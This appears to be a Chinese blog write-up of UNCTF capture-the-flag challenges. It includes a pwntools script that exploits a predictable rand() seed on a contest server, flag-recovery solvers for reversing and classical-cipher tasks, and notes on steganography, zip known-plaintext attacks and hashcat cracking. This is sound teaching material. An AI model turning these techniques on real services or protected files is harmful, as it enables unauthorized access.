<p><img src= "/img/8872068fbc6d4af586f11283c1a8cfcf-1689254349823-271.png" alt="在这里插入图片描述"></p>
<h3 id="石头剪刀布-西华大学"><a href="#石头剪刀布-西华大学" class="headerlink" title="石头剪刀布-西华大学"></a>石头剪刀布-西华大学</h3><p>伪随机数<br>伪代码中 seed=0xA<br>然后 pwn</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">elf = cdll.LoadLibrary(<span class="string">'libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"></span><br><span class="line">elf.srand(<span class="number">0xA</span>)</span><br><span class="line">k = <span class="number">0</span></span><br><span class="line"><span class="built_in">list</span> = []</span><br><span class="line"></span><br><span class="line">conn = remote(<span class="string">'node.yuzhian.com.cn'</span>, <span class="number">31599</span>)</span><br><span class="line"></span><br><span class="line">conn.recv()</span><br><span class="line">conn.send(<span class="string">'y'</span>)</span><br><span class="line">conn.recv()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"pwn!"</span>)</span><br><span class="line">conn.recv()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"1"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line"> num = elf.rand() % <span class="number">3</span></span><br><span class="line"> <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line"> payload = <span class="number">2</span></span><br><span class="line"> <span class="keyword">elif</span> num == <span class="number">1</span>:</span><br><span class="line"> payload = <span class="number">0</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> payload = <span class="number">1</span></span><br><span class="line"> <span class="built_in">print</span>(i, <span class="string">':'</span>, payload)</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">str</span>(payload))</span><br><span class="line"> conn.sendline(<span class="built_in">str</span>(payload))</span><br><span class="line"> tf = conn.recvrepeat(timeout=<span class="number">0.1</span>)</span><br><span class="line"> <span class="comment"># if "success!!!" in str(tf):</span></span><br><span class="line"> <span class="comment"># print("###################")</span></span><br><span class="line"></span><br><span class="line">conn.close()</span><br><span class="line">flag = conn.recvall()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">''</span>.join(<span class="built_in">list</span>), tf, flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src= "/img/5acef8e448c64377994a0838d9df83b0-1689254352850-274.png" alt="在这里插入图片描述"></p>
<h2 id="re"><a href="#re" class="headerlink" title="re"></a>re</h2><h3 id="whereisyourkey-广东海洋大学"><a href="#whereisyourkey-广东海洋大学" class="headerlink" title="whereisyourkey-广东海洋大学"></a>whereisyourkey-广东海洋大学</h3><p>先看 main<br>建了个数组<br>经过 ooooo 处理<br>即为 flag<br><img src= "/img/662707f47f814216a47389709123f9b4-1689254354631-277.png" alt="在这里插入图片描述"></p>
<p><img src= "/img/f8aa18f899f34a8e8a3f987404631d35-1689254356279-280.png" alt="在这里插入图片描述"></p>
<figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><iostream></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">ooooo</span><span class="params">(<span class="type">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (a1 == <span class="number">109</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="number">109</span>;</span><br><span class="line"> <span class="keyword">if</span> (a1 <= <span class="number">111</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> (a1 <= <span class="number">110</span>)</span><br><span class="line"> a1 -= <span class="number">2</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> a1 += <span class="number">3</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> a1;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="type">int</span> v5[<span class="number">10</span>], i;</span><br><span class="line"> v5[<span class="number">0</span>] = <span class="number">118</span>;</span><br><span class="line"> v5[<span class="number">1</span>] = <span class="number">103</span>;</span><br><span class="line"> v5[<span class="number">2</span>] = <span class="number">112</span>;</span><br><span class="line"> v5[<span class="number">3</span>] = <span class="number">107</span>;</span><br><span class="line"> v5[<span class="number">4</span>] = <span class="number">99</span>;</span><br><span class="line"> v5[<span class="number">5</span>] = <span class="number">109</span>; <span class="comment">// //109</span></span><br><span class="line"> v5[<span class="number">6</span>] = <span class="number">104</span>;</span><br><span class="line"> v5[<span class="number">7</span>] = <span class="number">110</span>;</span><br><span class="line"> v5[<span class="number">8</span>] = <span class="number">99</span>;</span><br><span class="line"> v5[<span class="number">9</span>] = <span class="number">105</span>;</span><br><span class="line"></span><br><span class="line"> cout<<<span class="string">"UNCTF{"</span>;</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i <= <span class="number">9</span>; ++i)</span><br><span class="line"> {</span><br><span class="line"> v5[i] = <span class="built_in">ooooo</span>(v5[i]);</span><br><span class="line"> cout << (<span class="type">char</span>)v5[i];</span><br><span class="line"> }</span><br><span class="line"> cout<<<span class="string">"}"</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="ezzzzre-广东海洋大学"><a href="#ezzzzre-广东海洋大学" class="headerlink" title="ezzzzre-广东海洋大学"></a>ezzzzre-广东海洋大学</h3><p><img src= "/img/0f5939a7be0f4b2d9b055c10187b1696-1689254358546-283.png" alt="在这里插入图片描述"><br>直接根据他的处理 flag = 2 * aHelloctf[i] - 69;<br><img src= "/img/99e2c915020340ef922e7edd5e812b9e-1689254360548-286.png" alt="在这里插入图片描述"></p>
<figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><iostream></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> string aHelloctf = <span class="string">"HELLOCTF"</span>;</span><br><span class="line"> string flag;</span><br><span class="line"> <span class="type">int</span> i;</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i <= <span class="number">7</span>; ++i)</span><br><span class="line"> {</span><br><span class="line"> flag = <span class="number">2</span> * aHelloctf[i] - <span class="number">69</span>;</span><br><span class="line"> cout << flag;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">//cout << flag << endl;</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h2><h3 id="dddd-西南科技大学"><a href="#dddd-西南科技大学" class="headerlink" title="dddd-西南科技大学"></a>dddd-西南科技大学</h3><p>就 0 和 1 转成<code>.-</code><br>/转成空格<br>莫斯解<br>赛博厨子构造一手一把梭</p>
<h3 id="md5-1-西南科技大学及-misc-小心海最后一步脚本"><a href="#md5-1-西南科技大学及-misc-小心海最后一步脚本" class="headerlink" title="md5-1-西南科技大学及 misc 小心海最后一步脚本"></a>md5-1-西南科技大学<em>及 misc 小心海最后一步脚本</em></h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"></span><br><span class="line"><span class="comment">######这里是MD5-1的脚本</span></span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">"outben.txt"</span>, <span class="string">'r'</span>)</span><br><span class="line">line = file.readlines()</span><br><span class="line"><span class="comment">## rint(line)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line"> <span class="string">'a'</span>, <span class="string">'b'</span>, <span class="string">'c'</span>, <span class="string">'d'</span>, <span class="string">'e'</span>, <span class="string">'f'</span>, <span class="string">'g'</span>, <span class="string">'h'</span>, <span class="string">'i'</span>, <span class="string">'j'</span>, <span class="string">'k'</span>, <span class="string">'l'</span>, <span class="string">'m'</span>, <span class="string">'n'</span>, <span class="string">'o'</span>,</span><br><span class="line"> <span class="string">'p'</span>, <span class="string">'q'</span>, <span class="string">'r'</span>, <span class="string">'s'</span>, <span class="string">'t'</span>, <span class="string">'u'</span>, <span class="string">'v'</span>, <span class="string">'w'</span>, <span class="string">'x'</span>, <span class="string">'y'</span>, <span class="string">'z'</span>, <span class="string">'1'</span>, <span class="string">'2'</span>, <span class="string">'3'</span>, <span class="string">'4'</span>,</span><br><span class="line"> <span class="string">'5'</span>, <span class="string">'6'</span>, <span class="string">'7'</span>, <span class="string">'8'</span>, <span class="string">'9'</span>, <span class="string">'0'</span>, <span class="string">'{'</span>, <span class="string">'}'</span>, <span class="string">'_'</span></span><br><span class="line">]</span><br><span class="line">flags = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> line:</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">36</span>, <span class="number">1</span>):</span><br><span class="line"> md = md5(<span class="built_in">list</span>[j].encode()).hexdigest()</span><br><span class="line"> <span class="keyword">if</span> (i.strip(<span class="string">'\n'</span>) == md):</span><br><span class="line"> flags += <span class="built_in">list</span>[j]</span><br><span class="line">flag = <span class="string">''</span>.join(flags)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'UNCTF{'</span>+flag+<span class="string">'}'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">####################下面是misc小心海的脚本,因为很像,直接拿md5-1的改的</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">"out.txt"</span>, <span class="string">'r'</span>)</span><br><span class="line">line = file.read()</span><br><span class="line">md = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">21</span>):</span><br><span class="line"> md.append(line[i * <span class="number">32</span>:(i + <span class="number">1</span>) * <span class="number">32</span>].lower())</span><br><span class="line"><span class="built_in">print</span>(md)</span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line"> <span class="string">'U'</span>, <span class="string">'N'</span>, <span class="string">'C'</span>, <span class="string">'T'</span>, <span class="string">'F'</span>, <span class="string">'a'</span>, <span class="string">'b'</span>, <span class="string">'c'</span>, <span class="string">'d'</span>, <span class="string">'e'</span>, <span class="string">'f'</span>, <span class="string">'g'</span>, <span class="string">'h'</span>, <span class="string">'i'</span>, <span class="string">'j'</span>,</span><br><span class="line"> <span class="string">'k'</span>, <span class="string">'l'</span>, <span class="string">'m'</span>, <span class="string">'n'</span>, <span class="string">'o'</span>, <span class="string">'p'</span>, <span class="string">'q'</span>, <span class="string">'r'</span>, <span class="string">'s'</span>, <span class="string">'t'</span>, <span class="string">'u'</span>, <span class="string">'v'</span>, <span class="string">'w'</span>, <span class="string">'x'</span>, <span class="string">'y'</span>,</span><br><span class="line"> <span class="string">'z'</span>, <span class="string">'1'</span>, <span class="string">'2'</span>, <span class="string">'3'</span>, <span class="string">'4'</span>, <span class="string">'5'</span>, <span class="string">'6'</span>, <span class="string">'7'</span>, <span class="string">'8'</span>, <span class="string">'9'</span>, <span class="string">'0'</span>, <span class="string">'{'</span>, <span class="string">'}'</span>, <span class="string">'_'</span></span><br><span class="line">]</span><br><span class="line">flags = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> md:</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">44</span>, <span class="number">1</span>):</span><br><span class="line"> md = md5(<span class="built_in">list</span>[j].encode()).hexdigest()</span><br><span class="line"> <span class="keyword">if</span> (i == md):</span><br><span class="line"> flags += <span class="built_in">list</span>[j]</span><br><span class="line">flag = <span class="string">''</span>.join(flags)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="md5-2-西南科技大学"><a href="#md5-2-西南科技大学" class="headerlink" title="md5-2-西南科技大学"></a>md5-2-西南科技大学</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">"out.txt"</span>, <span class="string">'r'</span>)</span><br><span class="line">line = file.readlines()</span><br><span class="line"><span class="comment">## rint(line)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line"> <span class="string">'a'</span>, <span class="string">'b'</span>, <span class="string">'c'</span>, <span class="string">'d'</span>, <span class="string">'e'</span>, <span class="string">'f'</span>, <span class="string">'g'</span>, <span class="string">'h'</span>, <span class="string">'i'</span>, <span class="string">'j'</span>, <span class="string">'k'</span>, <span class="string">'l'</span>, <span class="string">'m'</span>, <span class="string">'n'</span>, <span class="string">'o'</span>,</span><br><span class="line"> <span class="string">'p'</span>, <span class="string">'q'</span>, <span class="string">'r'</span>, <span class="string">'s'</span>, <span class="string">'t'</span>, <span class="string">'u'</span>, <span class="string">'v'</span>, <span class="string">'w'</span>, <span class="string">'x'</span>, <span class="string">'y'</span>, <span class="string">'z'</span>, <span class="string">'1'</span>, <span class="string">'2'</span>, <span class="string">'3'</span>, <span class="string">'4'</span>,</span><br><span class="line"> <span class="string">'5'</span>, <span class="string">'6'</span>, <span class="string">'7'</span>, <span class="string">'8'</span>, <span class="string">'9'</span>, <span class="string">'0'</span>, <span class="string">'{'</span>, <span class="string">'}'</span>, <span class="string">'_'</span>, <span class="string">'U'</span>, <span class="string">'N'</span>, <span class="string">'C'</span>, <span class="string">'T'</span>, <span class="string">'F'</span></span><br><span class="line">]</span><br><span class="line">flags = []</span><br><span class="line">t = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">39</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">44</span>, <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> f = <span class="built_in">int</span>(md5(<span class="built_in">list</span>[j].encode()).hexdigest(), <span class="number">16</span>)</span><br><span class="line"> hexed = <span class="built_in">hex</span>(f)[<span class="number">2</span>:]</span><br><span class="line"> <span class="keyword">if</span> (line[i].strip(<span class="string">'\n'</span>) == hexed):</span><br><span class="line"> flags += <span class="built_in">list</span>[j]</span><br><span class="line"> t.append(f)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> f = <span class="built_in">int</span>(md5(<span class="built_in">list</span>[j].encode()).hexdigest(), <span class="number">16</span>)</span><br><span class="line"> hexed = <span class="built_in">hex</span>(f ^ t[i - <span class="number">1</span>])[<span class="number">2</span>:]</span><br><span class="line"> <span class="keyword">if</span> (line[i].strip(<span class="string">'\n'</span>) == hexed):</span><br><span class="line"> flags += <span class="built_in">list</span>[j]</span><br><span class="line"> t.append(f)</span><br><span class="line">flag = <span class="string">''</span>.join(flags)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="caesar-西南科技大学"><a href="#caesar-西南科技大学" class="headerlink" title="caesar-西南科技大学"></a>caesar-西南科技大学</h3><p>凯撒换表 base</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">## B6vAy{dhd_AOiZ_KiMyLYLUa_JlL/HY}</span></span><br><span class="line"><span class="comment">## UNCTF{w0w_Th1s_d1fFerent_c4eSar}</span></span><br><span class="line"><span class="comment">## ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</span></span><br><span class="line"><span class="comment">## K=+19</span></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">"caesar.txt"</span>, <span class="string">"r"</span>)</span><br><span class="line">t = []</span><br><span class="line">o = file.read()</span><br><span class="line"><span class="built_in">list</span> = <span class="string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span></span><br><span class="line"><span class="comment">## f = o.strip('\n')</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">27</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">64</span>):</span><br><span class="line"> <span class="built_in">print</span>(o[i])</span><br><span class="line"> <span class="keyword">if</span> o[i] == <span class="built_in">list</span>[j]:</span><br><span class="line"> <span class="keyword">if</span> j + <span class="number">19</span> <= <span class="number">64</span>:</span><br><span class="line"> t.append(<span class="built_in">list</span>[j + <span class="number">19</span>])</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> t.append(<span class="built_in">list</span>[j + <span class="number">19</span> - <span class="number">64</span>])</span><br><span class="line"> <span class="comment"># print(t)</span></span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="comment"># (list[j + 19])</span></span><br><span class="line"> <span class="comment"># break</span></span><br><span class="line"> <span class="comment"># print(o[i], list[j])</span></span><br><span class="line">flag = <span class="string">''</span>.join(t)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>
<h3 id="Single-table-西南科技大学"><a href="#Single-table-西南科技大学" class="headerlink" title="Single table-西南科技大学"></a>Single table-西南科技大学</h3><p>paymfairx 密码修改<br>对称加密的流密码<br>根据 key 和 table 对应关系<br>列出新 table 如下图左侧<br>根据交叉对应关系得到右侧第三行<br>(第四行是我转小写尝试,还忘了个 T)<br>发现前面完美对应<br>后面却出现错误<br>看 koqw 像 know<br>know 啥哪<br>paymfairx 密码吗<br>略作改动:<br>UNCTF{GOD_YOU_KNOW_PLAYFAIR}<br>也不知道是故意需要修改的还是<br>我有那个细节错了<br>反正能做出来不管了</p>
<p><img src= "/img/5c5010e18e2f4d3a841b814c68ed26cb-1689254364821-289.png" alt="在这里插入图片描述"></p>
<h3 id="Multi-table-西南科技大学"><a href="#Multi-table-西南科技大学" class="headerlink" title="Multi table-西南科技大学"></a>Multi table-西南科技大学</h3><p>略修改加密算法<br>使其输出<code>table,base_table.index(flag[i])</code>来得到其他无关随机数的固定数据<br>可得出 UNCTF 加密得到的 SDCG<br>分别在<code>table[?、?、?、?][9、14、5、16]</code><br>由此可根据前四位密文逆推出<code>key = [9, 15, 23, 16]</code><br>这样解密所需的全部数据得到<br>编写解密脚本<br>加密:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">flowchart LR</span><br><span class="line"> 加密 --> flag</span><br><span class="line"> 加密 --> key</span><br><span class="line"> flag --> base_table列 -->table列</span><br><span class="line"> key --> table行</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">flowchart LR</span><br><span class="line"> 解密 -->key</span><br><span class="line"> table行 -->table列 --c--> base_table列 --> flag</span><br><span class="line"> key --> table行</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> string <span class="keyword">import</span> ascii_uppercase</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> b2a_hex,a2b_hex</span><br><span class="line"></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line">c = <span class="string">'SDCGW{MPN_VHG_AXHU_GERA_SM_EZJNDBWN_UZHETD}'</span></span><br><span class="line">base_table = [</span><br><span class="line"> <span class="string">'J'</span>, <span class="string">'X'</span>, <span class="string">'I'</span>, <span class="string">'S'</span>, <span class="string">'E'</span>, <span class="string">'C'</span>, <span class="string">'R'</span>, <span class="string">'Z'</span>, <span class="string">'L'</span>, <span class="string">'U'</span>, <span class="string">'K'</span>, <span class="string">'Q'</span>, <span class="string">'Y'</span>, <span class="string">'F'</span>, <span class="string">'N'</span>,</span><br><span class="line"> <span class="string">'V'</span>, <span class="string">'T'</span>, <span class="string">'P'</span>, <span class="string">'O'</span>, <span class="string">'G'</span>, <span class="string">'A'</span>, <span class="string">'H'</span>, <span class="string">'D'</span>, <span class="string">'W'</span>, <span class="string">'M'</span>, <span class="string">'B'</span></span><br><span class="line">]</span><br><span class="line">table = {}</span><br><span class="line">key = [<span class="number">9</span>, <span class="number">15</span>, <span class="number">23</span>, <span class="number">16</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">26</span>):</span><br><span class="line"> table[i]=ascii_uppercase[i:]+ascii_uppercase[:i]</span><br><span class="line">x = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> c:</span><br><span class="line"> <span class="keyword">if</span> i <span class="keyword">in</span> ascii_uppercase:</span><br><span class="line"> bt_num = table[key[x%<span class="number">4</span>]].index(i)</span><br><span class="line"> flag += base_table[bt_num]</span><br><span class="line"> x += <span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> flag += i</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<blockquote>
<p>以后找时间学学密码吧<br>之前一直想学一直没找到时间<br>靠着从 misc 那学的古典密码啥的,写了前几题的脚本<br>还有积累的脚本工具走到这<br>rsa 好多解应该是基础的 rsa,想拿工具试试来,苦于不咋会用于是 rsa 作罢<br>比完赛一定找大佬学学</p>
</blockquote>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="magic-word-西南科技大学"><a href="#magic-word-西南科技大学" class="headerlink" title="magic_word-西南科技大学"></a>magic_word-西南科技大学</h3><p>提示都送到嘴边了<br>直接零宽一把梭<br><img src= "/img/0fbd2358651b411291963e0fb443c135-1689254371995-292.png" alt="在这里插入图片描述"></p>
<h3 id="syslog-浙江师范大学"><a href="#syslog-浙江师范大学" class="headerlink" title="syslog-浙江师范大学"></a>syslog-浙江师范大学</h3><p>打开是个系统日志文件<br>寻找敏感信息例如<br>发现能搜索到 password<br><img src= "/img/6c47289892b34d779b7126e5f4f722e2-1689254374328-295.png" alt="在这里插入图片描述"><br>解 base 得到压缩包密码<br>秒出</p>
<h3 id="In-the-Morse-Garden-陆军工程大学"><a href="#In-the-Morse-Garden-陆军工程大学" class="headerlink" title="In_the_Morse_Garden-陆军工程大学"></a>In_the_Morse_Garden-陆军工程大学</h3><p>pdf 发现隐藏字符<br>赛博厨子构造一手<br><img src= "/img/72b442bc2ce34196b84d90bda5cc0160-1689254375586-298.png" alt="在这里插入图片描述"></p>
<h3 id="芝麻开门-广东海洋大学"><a href="#芝麻开门-广东海洋大学" class="headerlink" title="芝麻开门-广东海洋大学"></a>芝麻开门-广东海洋大学</h3><p>txt 下面有段 base<br>a2V5MQ==<br>拿他当 lsb 密码,一把梭</p>
<h3 id="找得到我吗-闽南师范大学"><a href="#找得到我吗-闽南师范大学" class="headerlink" title="找得到我吗-闽南师范大学"></a>找得到我吗-闽南师范大学</h3><p>docx,隐藏字符,零宽都试过了<br>以为触及知识盲区了<br>放了发现已经很多解了<br>然后鼓起勇气看了下 xml<br>发现还真在里面</p>
<blockquote>
<p>misc 刷的文档题不多,还没大见过放在 xml 里的,我太菜了,还好知道这个知识点<br>但那道社什么社这么多解是真没想到,没对上脑电波?</p>
</blockquote>
<p><img src= "/img/91f5d9468dc3475a87e29aee97075cd0-1689254380855-301.png" alt="在这里插入图片描述"></p>
<h3 id="zhiyin"><a href="#zhiyin" class="headerlink" title="zhiyin"></a>zhiyin</h3><blockquote>
<p>小~黑子!</p>
</blockquote>
<p>hex 看篮球,一眼倒了<br>逆过来<br>Go_p1ay(那个 1 和 l 我当时都没发现,还有下划线也没划清楚,傻乎乎试了半天)<br>下半段 zhiyinhex 里发现<code>.-</code>莫斯出<br><img src= "/img/def310ca152344c6bd76b05d5a7d94ea-1689254383030-304.png" alt="在这里插入图片描述"></p>
<h3 id="巨鱼-河南理工大学"><a href="#巨鱼-河南理工大学" class="headerlink" title="巨鱼-河南理工大学"></a>巨鱼-河南理工大学</h3><p>上来 binwalk 下<br>出来个压缩包<br>对 fish 一通操作没找到密码<br>卡了半天去看别的题了<br>回来发现 png 有大问题<br>修改长宽高发现<code>无所谓我会出手</code><br>解压<br>文档有密码<br>去看图片</p>
<blockquote>
<p>我当时一眼苯环,服了,高中化学差点还给老师了</p>
</blockquote>
<p>本来以为氯化苯<br>输入 C6Cl6、汉语等都不对<br>静下心来一看,这 nm 不是苯环<br>再试 C6H6Cl6 还不对<br>脑洞一开 666<br>flag get√<br><img src= "/img/c00d5693a42e44f8a13e9548ea78faaf-1689254384944-307.png" alt="在这里插入图片描述"></p>
<h3 id="清和-fan-江西警察学院"><a href="#清和-fan-江西警察学院" class="headerlink" title="清和 fan-江西警察学院"></a>清和 fan-江西警察学院</h3><p><img src= "/img/753148ef28944da884964c67e763cb49-1689254386910-310.png" alt="在这里插入图片描述"><br>先是注释提示社工<br>很容易找到<br>解压缩<br>lsb 隐写<br><img src= "/img/b338b41d3b174d5b957cf794d9693c34-1689254388637-313.png" alt="在这里插入图片描述"><br>得到第二层密码<br>发现段 wav 文件<br>听了下,这频率感觉像 sstv</p>
<blockquote>
<p>vmware 的 Kali 前几个月转 wsl 了<br>kali 临时现装 sstv 出了点 bug<br>网上找了半天发现个手机软件</p>
</blockquote>
<blockquote>
<p>大晚上的 舍友都在打游戏,吵得很<br>于是去阳台识别<br>北方地区大晚上冷得很<br>识别了好几次<br>出来个微糊的</p>
</blockquote>
<p><img src= "/img/456f8bb9551647fb83cba89b5e7d8988-1689254390452-316.png" alt="在这里插入图片描述"><br>flag get√</p>
<blockquote>
<p>清和是吧,<del>举办了</del> 不是</p>
</blockquote>
<h3 id="剥茧抽丝-内蒙古警察职业学院"><a href="#剥茧抽丝-内蒙古警察职业学院" class="headerlink" title="剥茧抽丝-内蒙古警察职业学院"></a>剥茧抽丝-内蒙古警察职业学院</h3><p>nm 看到这注释,有多少人想到的是掩码<br>hashcat 跑了好几分钟<br>发现密码就是这<br><del>小丑竟是我自己</del><br><img src= "/img/9b3a6706674948618b93080de2645641-1689254393576-319.png" alt="在这里插入图片描述"><br>零宽换了几个方式,终于出了(文件零宽)</p>
<p><img src= "/img/d558234decca4bad958098f167bde455-1689254395921-322.png" alt="在这里插入图片描述"><br>结果,这不是下一层密码<br>看了眼 hint<br>crc 不一样<br>没对上脑电波<br>卡了几天?<br>想到,外面的比里面的大,能删减啊<br>把零宽的部分删了<br>发现正好<br>明文攻击<br><img src= "/img/66c33e1e04534881808eb055f1283f6e-1689254399345-325.png" alt="在这里插入图片描述"><br>然后再用上面一层零宽解出来的解密码<br>flag get<br>颓废~(这个题是拖得最长的,不乐)</p>
<h3 id="我小心海也绝非鳝类-中国计量大学现代科技学院"><a href="#我小心海也绝非鳝类-中国计量大学现代科技学院" class="headerlink" title="我小心海也绝非鳝类-中国计量大学现代科技学院"></a>我小心海也绝非鳝类-中国计量大学现代科技学院</h3><p>小心海说的话解 base92<br>一开始 ocr 识别的 c 成大写了<br>解出来有不可打印字符<br>检查了一遍改过来了</p>
<p>然后发现能 lsb EASYLSB<br>尝试把小心海的话当密码再解 lsb<br>发现串 16,开始误入歧途转了文件<br>想到小心海给我说的话<br>尝试 md5 转<br>切片 32 位<br>再改下 md5-1 的脚本==细看的话去 cypto 区 md5-1 看吧<br>直出<br><img src= "/img/bc71bba99a2d4166b17d14b2bdb66917-1689254401620-328.png" alt="在这里插入图片描述"></p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>unctf</tag>
</tags>
</entry>
<entry>
<title>22年10月末</title>
<url>/2023/07/22%E5%B9%B410%E6%9C%88%E6%9C%AB/</url>
<content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
